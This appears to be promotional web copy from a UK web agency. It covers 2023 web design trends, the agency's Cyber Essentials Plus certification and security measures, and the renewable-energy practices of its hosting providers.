Interfaces that include motion do not have to rely on plugins but can be integrated through development frameworks. Enhancing your website and brand through Motion UI doesn’t have to mean animation or videos – additions as simple as the motion micro-interactions that occur when a user hovers over an action point or clicks a transition button can make the difference between a static website and one that ignites a user’s interest. Take a look at the Motion UI on our own website, for example.
As the internet grows and changes, the popularity of voice search continues to rise through Amazon Alexa style devices and “Hey Siri” requests. And, with the increasing popularity of Internet of Things (IoT) devices, such as smart speakers, this trend doesn’t show any signs of decline. This is not a trend to ignore: optimising your business for voice search will help with every aspect of your overall SEO. Click here to find out more about what steps to take for voice search optimisation.
You may not realise, but many websites that you visit are actually using PWA technologies to provide an experience closer to that of native applications. You can see this when you visit sites like Twitter, Gmail, etc.
Progressive web apps are essentially web applications that feel and function like a native mobile application. This means they increase the quality of user-experience by offering advantages such as offline use, hardware access, push notifications, and the ability to be “installed” on the user’s device. While these clever web apps have been on the increase for a while, their popularity shows no sign of slowing down. Click here to read more about progressive web apps.
Single Page Applications (SPAs) are a key enabler of our constant-scrolling habits. SPAs work inside a browser to offer a seamless user experience by dynamically loading as a single page. This way the user does not have to wait for the site to continually reload, and can enjoy uninterrupted scrolling. They can offer better page performance and data protection, and work efficiently even when the user has a poor internet connection, as the content loads completely on first contact with the server.
Single-page websites (SPWs) work in much the same way. Website content, such as that which might otherwise be found under a “Work” or “About” tab, is fully loaded on the initial page and can be navigated by links within the one page. These intuitive and well-structured single-page websites increase the likelihood of maintaining the attention of users, and enable control of the order in which information is absorbed. Compared to multi-page sites, the site design and development requires less time and money and is more suited to optimisation for mobile devices.
Smart Content refers to the dynamic elements of your website that change depending on the site user profile. It targets individual customers with a personalised experience, and also decreases site loading times to drive significantly higher conversion rates and ROI. Read more about Smart content loading in our blog.
The green transition is here, and, with the internet as a major producer of carbon emissions, web developers have an important role to play. From sustainable web design, to efficient web development, to green hosting, there are many things website creators can and should be doing where possible. As awareness grows about the need for online business that cares for people and planet, and creative solutions increase, we expect sustainable web development practices to continue to grow.
Online security may be one of the less glamorous elements of the web, but for any company that has experienced a cyber attack first-hand, it has always been extremely important.
During 2022 we saw an increase in large-scale nation-state cyber-attacks, such as the Russian attacks against Ukraine and Montenegro and the unidentified attack on the New Zealand government. In 2023 businesses should expect attacks of this kind and scale to become more common and sophisticated. Some of the more pessimistic members of our team would not be surprised if a government body or key public service is brought down by a cyber attack.
These security concerns are not just reserved for large corporations. In 2022, research by the World Economic Forum found that 95% of cyber security issues were caused by human error or a lack of cyber security awareness. Websites and web applications process a lot of valuable data, and with more company assets moving to the cloud to accommodate hybrid/remote working, the potential damage caused by cyber-attacks has never been higher.
Many of the trends we see for 2023 are very similar to those we saw in 2022. Will 2023 be the year that web3 finally takes off? Or the year that a considerable push on hardware that supports AR makes it an essential part of our daily lives? Only time will tell!
One thing is certain, however: companies that provide clients and customers with the best user experience will thrive in 2023. There is a lot of exciting new technology out there, but there is no magic bean this year that will separate the pack. Companies that take the time to understand their customers and demographics, and tailor their website and online marketing to use the above tools (Motion UI, smart content, PWAs, AR etc.) correctly, will come out on top.
Digital security is a necessity in an age where attacks and data exfiltration are commonplace. Hosting and managing hundreds of websites and systems also means handling a lot of valuable information. Keeping that data safe is a responsibility we take very seriously.
Cyber Essentials Plus is a UK Government-backed scheme designed to demonstrate organisations’ resilience against cyber attack. It ensures our systems are up-to-date, secure and fit for purpose, meaning our clients can rest assured that they are working with a business that is confident in its digital security.
The standard Cyber Essentials certification covers these five main areas:
As part of the Plus version of the certification, Infotex underwent an independent external technical audit by URM Consulting, to ensure that the necessary technical controls are in place for the security of our systems. A random sample of staff were selected to be audited, making sure their work environments are up to date and secured. Our in-house infrastructure team periodically review all devices to ensure they are all configured correctly. By passing, we are proving our internal processes, policies and security controls are in line with National Cyber Security Centre (NCSC) standards.
Having previously completed Cyber Essentials Plus, the biggest change for this year is that all cloud-service admin accounts offering multi-factor authentication must now have it enabled. In fact, Infotex have gone one step further and enabled it on all cloud services where feasible. Alongside this, the minimum password length has been increased for all accounts, reflecting an increasingly hostile online environment where password-cracking technology continues to improve. We have also now disabled that stalwart browser of the last two decades, Internet Explorer, on all our Windows devices, bringing that chapter of the web to a close.
Much like a car MOT, Cyber Essentials Plus is the minimum standard that we work to. We go above and beyond it with regular reminders and training – both face-to-face and virtual – provided to all Infotex staff, keeping security in mind across our practices, device configurations and website development processes. Doing all we can to maintain our own cyber security also protects our clients.
If you are looking at your business’s cyber security, undertaking Cyber Essentials Plus is something that we’d thoroughly recommend. It focuses the company on the aspects that will give you the greatest security benefit against the attacks happening in the real world, and the NCSC evolves the standard every year based upon the attack data that they witness.
Last Updated July 2023
It is estimated that data centres contribute 2% of all global greenhouse gas emissions – a figure that is rising as digital demand increases. However, by utilising cloud-based services for our hosting we are sharing resources and facilities, which reduces the number of duplicate, energy-hungry single-use servers.
We are conscious that site hosting will have an impact on Infotex’s carbon footprint. Because of this we are always looking to make sure our technical partners have, or are, taking steps towards sustainability. Our monitoring systems also help us to ensure that we are using these resources efficiently.
For the hosting of our primary websites and systems we use three main providers: Rackspace, Amazon Web Services (AWS) and iomart.
Rackspace’s approach to the environment is straight-forward: they aspire to give back more than they take from the planet.
In 2019, Rackspace reviewed its energy strategy and opted to focus resources and efforts on energy reduction instead of purchasing carbon offsets.
Rackspace’s UK data centres LON3 and LON5 run on 100% renewable energy. Data centre LON8 does not, though Rackspace publishes an Environmental, Social and Governance Report (2021) showing steps they are taking to be net-zero across all sites by 2045.
Their commitment to a greener business isn’t just limited to energy. They have a host of creative ways to minimise waste in offices, such as composting coffee grounds and shipping pallets, refurbishing retired IT equipment for aftermarket use, and collecting HVAC condensate to maintain landscaping and operate cooling towers.
As part of their route to net zero, they have been publishing a greenhouse gas emissions inventory every year since 2008, covering their global operations.
For further details visit Rackspace’s Corporate Responsibility section of their site.
Amazon Web Services (AWS) is targeting its global operations to be powered by renewable energy by 2025. The London- and Ireland-based AWS regions (where we host our sites and systems) are currently powered by 95% renewable energy.
In 2019 Amazon launched the UK’s largest wind Corporate Power Purchase Agreement, located in Kintyre Peninsula, Scotland. The new wind farm is expected to produce 168,000 MWh of clean energy annually – enough to power 46,000 UK homes every year.
Amazon provides a Customer Carbon Footprint Tool which allows us to monitor our own carbon emissions and how those would compare to running on-premise computing equivalents – cloud computing can be 80% more efficient in this respect.
For further details visit Amazon’s Sustainability in the Cloud section of their site.
It’s not only carbon emissions that AWS monitors: their water stewardship programme aims to be water positive (that is, returning more water to communities than they use) by 2030.
All of iomart’s data centres are powered by 100% renewable energy. They continuously evaluate sites to continue to reduce emissions, such as looking at how waste heat can be turned back into usable power. This project won them the ‘Best Use of Emerging Technology’ from the Digital City Awards in March 2022.
In 2022 iomart developed a Carbon Roadmap to help understand their Scope 1 and 2 GHG emissions, and set carbon reduction targets. They also comply with ISO50001 Energy Management to reduce energy usage.
Further details can be found on iomart’s Environmental, Social & Governance page.
Discover how our team can help you on your journey. Talk to us today